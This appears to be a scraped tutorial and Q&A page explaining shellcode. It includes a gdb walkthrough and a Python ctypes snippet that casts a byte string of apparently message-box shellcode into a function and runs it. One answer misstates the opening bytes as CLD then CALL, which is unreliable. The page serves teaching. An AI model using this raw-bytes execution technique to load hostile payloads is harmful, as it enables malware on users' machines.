0x004013a0 <+0>: push %ebp
0x004013a1 <+1>: mov %esp,%ebp
0x004013a3 <+3>: and $0xfffffff0,%esp
0x004013a6 <+6>: sub $0x10,%esp
0x004013a9 <+9>: call 0x4018e4 <__main>
0x004013ae <+14>: movl $0x402000,0xc(%esp)
0x004013b6 <+22>: call 0x40138c <real_function> ; <- here we call our `real_function`
0x004013bb <+27>: mov 0xc(%esp),%eax
0x004013bf <+31>: call *%eax ; <- here we call the address that is loaded in eax (the address of the beginning of our shellcode)
0x004013c1 <+33>: mov $0x0,%eax
0x004013c6 <+38>: leave
0x004013c7 <+39>: ret
End of assembler dump.
(gdb)
There are two call, let's make a break point at <main+31> to see what is loaded in eax:
(gdb) break *(main+31)
Breakpoint 1 at 0x4013bf
(gdb) run
Starting program: shellcode.exe
[New Thread 2856.0xb24]
I'm here
Breakpoint 1, 0x004013bf in main ()
(gdb) disassemble
Dump of assembler code for function main:
0x004013a0 <+0>: push %ebp
0x004013a1 <+1>: mov %esp,%ebp
0x004013a3 <+3>: and $0xfffffff0,%esp
0x004013a6 <+6>: sub $0x10,%esp
0x004013a9 <+9>: call 0x4018e4 <__main>
0x004013ae <+14>: movl $0x402000,0xc(%esp)
0x004013b6 <+22>: call 0x40138c <real_function>
0x004013bb <+27>: mov 0xc(%esp),%eax
=> 0x004013bf <+31>: call *%eax ; now we are here
0x004013c1 <+33>: mov $0x0,%eax
0x004013c6 <+38>: leave
0x004013c7 <+39>: ret
End of assembler dump.
(gdb)
Look at the first 3 bytes of the data that the address in eax continues:
(gdb) x/3x $eax
0x402000 <shellcode>: 0xfc 0x33 0xd2
(gdb) ^-------^--------^---- the first 3 bytes of the shellcode
So the CPU will call 0x402000, the beginning of our shell code at 0x402000, lets disassemble what ever at 0x402000:
(gdb) disassemble 0x402000
Dump of assembler code for function shellcode:
0x00402000 <+0>: cld
0x00402001 <+1>: xor %edx,%edx
0x00402003 <+3>: mov $0x30,%dl
0x00402005 <+5>: pushl %fs:(%edx)
0x00402008 <+8>: pop %edx
0x00402009 <+9>: mov 0xc(%edx),%edx
0x0040200c <+12>: mov 0x14(%edx),%edx
0x0040200f <+15>: mov 0x28(%edx),%esi
0x00402012 <+18>: xor %ecx,%ecx
0x00402014 <+20>: mov $0x18,%cl
0x00402016 <+22>: xor %edi,%edi
0x00402018 <+24>: xor %eax,%eax
0x0040201a <+26>: lods %ds:(%esi),%al
0x0040201b <+27>: cmp $0x61,%al
0x0040201d <+29>: jl 0x402021 <shellcode+33>
....
As you see, a shellcode is nothing more than assembly instructions, the only different is in the way you write these instructions, it uses special techniques to make it more portable, for example never use a fixed address.
The python equivalent to the above program:
#!python
from ctypes import *
shellcode_data = "\
\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B\
\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9\
\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C\
\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0\
\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B\
\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72\
\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03\
\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\
\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\
\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\
\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66\
\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14\
\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72\
\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F\
\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01\
\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65\
\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B\
\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42\
\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24\
\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57\
\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01\
\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F\
\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24\
\x40\xFF\x54\x24\x40\x57\xFF\xD0"
shellcode = c_char_p(shellcode_data)
function = cast(shellcode, CFUNCTYPE(None))
function()

shellcode , if I'm not mistaken, contains architecture-specific compiled code that roughly translates as a function call. (not an architecture expert, and the code is truncated...)
Therefore, once you've created a C-style string with create_string_buffer, you can then fool python into thinking that it is a function with the cast call. Python then executes the code originally contained in shellcode.
There's a helpful link here: http://www.blackhatlibrary.net/Python#Ctypes

Let us not forget that in order to have executable code, it has to be converted to a format that your machine understands. What you are doing there is providing a sequence of byte codes that can be interpreted by your machine, so you can tell your machine to execute it. You are effectively skipping the job of a compiler by providing the final byte codes; this technique is common in Just-In-Time compilers which have to create executable code while the program is running.
So, this actually have little to none relation to C (or Python, or any other language), but has a huge relation to the details of the architecture this code is expected to run at.
The first byte code there is CLD (0xfc) followed by a CALL instruction (0xe8) which makes the code jump to the address based on the offset specified in the next 4 bytes in this bytecode sequence, and so on.

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.